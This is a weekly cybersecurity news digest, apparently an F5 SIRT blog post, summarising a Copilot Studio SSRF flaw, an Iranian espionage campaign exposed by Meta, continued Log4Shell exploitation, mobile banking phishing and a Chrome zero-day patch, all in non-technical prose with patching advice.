Chrome zero-day fix MS Copilot Log4Shel still being exploited
Notable news for the week of Aug 18 -24th, 2024. This week, your editor is Lior from F5 Security Incident Response Team. Going over the news, I have found that everyone is busy. Google fixes ninth actively exploited Chrome zero-day in 2024, providing job security for products SIRT (the vul management group). Remember log4shell-vulnerability from two years a go? This is still being exploited! To me this always seems strange, but it looks like installing or not patching old software is also okay by anyone who decides to use software without checking for weaknesses. So, the person who installed it will be busy fixing it. Like every week, there are always new attacks. This week we have one that is very popular with phishing techniques, and while we talk about AI, the copilot studio had a vulnerability that ended up with information disclosure. So yes, everyone is busy in the security industry. Which, I guess, is not a bad thing?!?! Until next time, keep it safe. Lior.
Microsoft Copilot Studio Exploit Leaks Sensitive Cloud Data
Just for the fun, I have asked CoPilot to summarize this article, this is what it wrote:
Introduction
In a recent discovery, security researchers identified a critical vulnerability in Microsoft’s Copilot Studio, a tool designed for creating custom AI chatbots. This flaw, tracked as CVE-2024-38206, has significant implications for cloud security and data privacy.
The Vulnerability
The vulnerability is a server-side request forgery (SSRF) bug that allows authenticated attackers to make external HTTP requests. This exploit can access sensitive information across multiple tenants within cloud environments.
Impact and Risks
While no cross-tenant information was immediately accessible, the shared infrastructure among tenants magnifies the risk
Microsoft’s Response
Microsoft acted swiftly upon notification of the flaw, fully mitigating the issue with no action required from Copilot Studio users
Conclusion
This incident highlights the critical need for robust security practices in developing and deploying AI tools. As organizations increasingly rely on cloud-based solutions, ensuring the security of these environments is paramount.
Meta Exposes Iranian Hacker Group Targeting Global Political Figures on WhatsApp
Meta, the parent company of Facebook, has uncovered and exposed a sophisticated cyber-espionage campaign orchestrated by an Iranian hacker group known as 'Tortoiseshell'. This group has been active since at least 2018 and is believed to be linked to Iran's Islamic Revolutionary Guard Corps (IRGC).
The hackers primarily targeted military personnel and defense companies in the U.S. and Middle East. They used fake online personas on social media platforms like Facebook, LinkedIn, and Instagram to connect with their targets and build trust. Once a relationship was established, they would direct their targets to malicious websites or send them malware-infected files.
Meta's investigation revealed that” Tortoiseshell” (aka UNC1549 by Google and Imperial Kitten by CrowdStrike) employed a variety of techniques, including social engineering, credential harvesting, and the deployment of custom malware. The company has tried to stop the group from working by taking away their accounts and sharing important information with industry partners and the police.
This discovery shows the ongoing threat of state-sponsored cyber-espionage groups. It also shows how important it is to be careful and take strong cybersecurity measures to protect sensitive information and infrastructure.
https://thehackernews.com/2024/08/meta-exposes-iranian-hacker-group.html
Two Years On, Log4Shell Vulnerability Still Being Exploited to Deploy Malware
Two years after it was found, the Log4Shell weakness (CVE-2021-44228) in the Apache Log4j logging library is still being used by cybercriminals to spread malware. Despite widespread awareness and efforts to patch the vulnerability, many systems remain unpatched, leaving them susceptible to attacks.
The Log4Shell flaw is particularly dangerous because it allows for remote code execution, meaning attackers can run arbitrary code on affected systems. This has led to a variety of malicious activities, including the deployment of ransomware, cryptojackers, and botnets.
The article highlights that attackers are using this vulnerability to target a range of industries, including finance, healthcare, and technology. Security researchers have observed a continuous stream of exploitation attempts, indicating that the threat remains persistent and widespread.
Organizations are told to make sure their systems have the latest security patches. They should also use other security measures like network segmentation, intrusion detection systems, and continuous monitoring to reduce the risks of Log4Shell.
New Phishing Technique Bypasses Security on iOS and Android to Steal Bank Credentials
A newly identified phishing technique is successfully bypassing security measures on both iOS and Android devices to steal bank credentials. This method uses malicious apps that are disguised as legitimate applications and are often distributed through unofficial app stores or phishing websites.
Once installed, these malicious apps use sophisticated overlay attacks to display fake login screens when users open their banking apps. The fake screens are almost indistinguishable from the real ones, tricking users into entering their sensitive information, such as usernames, passwords, and two-factor authentication codes.
This method is very effective because it uses the built-in accessibility features on mobile devices. These features are made to help people with disabilities, but they can be used for bad things. The attackers can also use these features to intercept SMS messages, further compromising the security of two-factor authentication.
Security experts suggest that users only download apps from official app stores. Be careful about giving apps too many permissions, and update their devices often to the latest security updates. Additionally, enabling features like Google Play Protect and using mobile security software can help mitigate these risks.
The article underscores the evolving nature of phishing attacks and the importance of user awareness and robust security practices to protect sensitive financial information on mobile devices
Google fixes ninth Chrome zero-day tagged as exploited this year
Google has released an update to address the ninth actively exploited zero-day vulnerability in its Chrome web browser for the year 2024. The vulnerability was discovered to be actively exploited in the wild, posing a significant security risk to users.
This zero-day flaw affects the browser's V8 JavaScript engine, which is responsible for processing JavaScript code. If used, it could let attackers run any code on a victim’s computer. This could lead to data breaches, system compromises, and other bad things happening.
Google's security team quickly responded to the discovery by releasing a patch to fix the vulnerability. Users are strongly advised to update their Chrome browsers to the latest version immediately to protect against potential exploitation. The company has also rolled out the update to the stable channel, ensuring that it reaches as many users as possible.
The article shows how important it is to keep software up-to-date. It also shows that Google will quickly fix security problems to protect its users. It also reminds us of the ongoing threats from zero-day vulnerabilities and the need to be careful in keeping strong cybersecurity practices.